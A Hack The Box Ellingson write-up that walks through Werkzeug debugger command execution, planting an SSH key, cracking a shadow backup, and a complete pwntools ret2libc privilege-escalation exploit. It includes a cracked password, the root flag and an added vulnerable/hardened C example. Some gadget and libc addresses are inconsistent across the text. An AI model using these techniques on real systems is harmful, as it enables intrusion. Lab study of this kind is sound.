
Hello fellow hackers, today I'm going to solve Ellingson from Hack The Box.
So let's get started!!!!
I started with nmap to discover open ports on the machine:
nmap -A -v -sT 10.10.10.139

So the box has two ports open:
1- ssh running on port 22
2- nginx web server running on port 80
Seems interesting??? Not yet, mate. Let's check out port 80.
It looks like a website for the Ellingson Mining Company.

After some goofing around inside the web page I found many interesting things:

This page is telling us that there is some kind of protection on the website.

This page indicates that the site has already been hacked!!

And this weird page is telling us about the most used passwords!!!
Since the articles under /articles/ are numbered sequentially and there are only 3 of them, I tried to access article 4 and got an error …

After checking out the page I found that it's running the Werkzeug debugger, which is a Python debugger.
After some Google searching I found out that you can run Python inside that debugger, so let's try it out:
import os
os.popen("ls").read()   # run a shell command and return its output

And it worked!!! We can run commands on the machine as the hal user.
After some enumeration I tried to get a reverse shell from the machine, but it didn't work, probably because of the protection that has been added to the site, so I started to search for another way in.
After some time I found the .ssh directory and an authorized_keys file that I can write my SSH public key into:
os.popen("echo 'your public key' >> /home/hal/.ssh/authorized_keys").read()
After writing my public key into the file, let's now log in over SSH:
ssh hal@10.10.10.139

And we are in as hal, but we can't read the user flag, so we need to escalate our privileges.
After some enumeration I found that the hal user is part of the adm group, so we need to find any useful files that we can read as a member of adm:
find / -group adm 2>/dev/null

After running the command I found a backup of the shadow file, which is usually owned by root.
So let's crack!!!
hashcat -a 0 -m 1800 shadow.bak rockyou.txt --force
It took some time to run, but it cracked it:
user: margo password: iamgod$08

And we are in!!!!
Now for the root part.
After some enumeration I found a binary that is not usually found on Debian:

After running the binary it asked for a password. After trying some defaults that didn't work, I tried to cause a buffer overflow, so I entered 200 "A" characters.
And we have a segmentation fault.
So let's run it in gdb to see where it crashed:

So the program crashed after being fed a 200-character pattern. Let's see where it started to overwrite:

Using pattern offset we know that the return address is overwritten after 136 characters.
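As an added example (not the source of the garbage binary, which this write-up does not show), here is a constructed password check with the same 136-byte distance from the input buffer to the saved return address, beside a hardened version that rejects over-long input before copying it. The layout (a 128-byte buffer followed by the 8-byte saved rbp) and the placeholder secret are assumptions.

```c
/* Added example: a constructed password check, not the source of garbage.
 * The stack layout is an assumption chosen to match the write-up's finding
 * that the return address is overwritten after 136 bytes: a 128-byte buffer,
 * then the 8-byte saved rbp, then the saved return address. */
#include <stdio.h>
#include <string.h>

#define PASS_BUF 128
#define SECRET   "constructed-secret"   /* placeholder, not the box's password */

/* Vulnerable form: strcpy() has no bound, so 200 bytes of input run past the
 * buffer and the saved rbp into the return address (the segfault on the page). */
int check_password_vulnerable(const char *input)
{
    char buf[PASS_BUF];
    strcpy(buf, input);                  /* unbounded copy: the bug */
    return strcmp(buf, SECRET) == 0;
}

/* Hardened form: look for the terminator within the buffer size first; if
 * there is none, the input cannot fit and is rejected before any copy. */
int check_password_hardened(const char *input)
{
    char buf[PASS_BUF];
    const char *end = memchr(input, '\0', PASS_BUF);
    if (end == NULL)                     /* 128 bytes or more: would overflow */
        return -1;
    memcpy(buf, input, (size_t)(end - input) + 1);
    return strcmp(buf, SECRET) == 0;
}

int main(void)
{
    char probe[201];
    memset(probe, 'A', 200);             /* the 200 "A"s from the write-up */
    probe[200] = '\0';
    printf("hardened: %d\n", check_password_hardened(probe));  /* prints -1 */
    /* check_password_vulnerable(probe) would smash the stack; not called. */
    return 0;
}
```

Compiler hardening (stack protector, PIE) would add defence in depth, but the bounds check is what removes the bug itself.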
Now let's get some addresses to write our exploit:
objdump -D garbage |grep main
gives the address: 0x401619
objdump -D garbage |grep puts
gives: plt_puts: 0x401050 and got_puts: 0x404028
ropper -f garbage | grep rdi
pop_rdi = 0x40122
ldd garbage | grep libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
0x71910
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
Now to our exploit:
#REMOTE SCRIPT:
from pwn import *

context(os="linux", arch="amd64")
context(terminal=['tmux', 'new-window'])
#context.log_level = 'DEBUG'

# run the binary on the box over ssh as margo
shell = ssh('margo', '10.10.10.139', password='iamgod$08', port=22)
p = shell.process('/usr/bin/garbage')
#p = gdb.debug('./garbage', 'b main')

#stage 1: leak the libc address of puts by calling puts(got_puts), then return to main
#objdump -D garbage |grep main
plt_main = p64(0x401619)
#objdump -D garbage |grep puts
# 401050: ff 25 d2 2f 00 00    jmpq *0x2fd2(%rip)    # 404028 <puts@GLIBC_2.2.5>
plt_put = p64(0x401050)
got_put = p64(0x404028)
#ropper -f garbage | grep rdi
pop_rdi = p64(0x40179b)
# the return address is overwritten after 136 bytes (pattern offset)
junk = b"A" * 136

#Enter access password: sdfdsf
#
#access denied.
payload = junk + pop_rdi + got_put + plt_put + plt_main
p.sendline(payload)
p.recvuntil(b'denied.')
leaked_puts = p.recv()[:8].strip().ljust(8, b"\x00")
log.success("Leaked puts@GLIBC: " + str(leaked_puts))
leaked_puts = u64(leaked_puts)
#log.success("Leaked puts@GLIBC (unpacked): " + hex(leaked_puts))

#stage 2: compute the libc base from the leak, then call setuid(0) and execvp("/bin/sh", NULL)
pop_rdi = p64(0x40179b)
#0x0000000000401799: pop rsi; pop r15; ret;
pop_rsi = p64(0x401799)
#readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
#libc_put = 0x71910
libc_put = 0x809c0
#readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
#libc_sys = 0x449c0
#libc_sys = 0x4f440
#readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep execvp
libc_execvp = 0xe5490
# strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
#libc_sh = 0x181519
libc_sh = 0x1b3e9a
libc_setuid = 0xe5970
offset = leaked_puts - libc_put          # libc base address
execvp = p64(offset + libc_execvp)
setuid = p64(offset + libc_setuid)
sh = p64(offset + libc_sh)
null = p64(0x00)
# the pop rsi gadget also pops r15, so it consumes two values
payload = junk + pop_rdi + null + setuid + pop_rdi + sh + pop_rsi + null + null + execvp
p.sendline(payload)
p.recvuntil(b'denied.')
#raw_input()
p.interactive()

And we are root!!!
And the root flag is: 1cc73a448021ea81aee6c029a3d2f997
SMT Red Team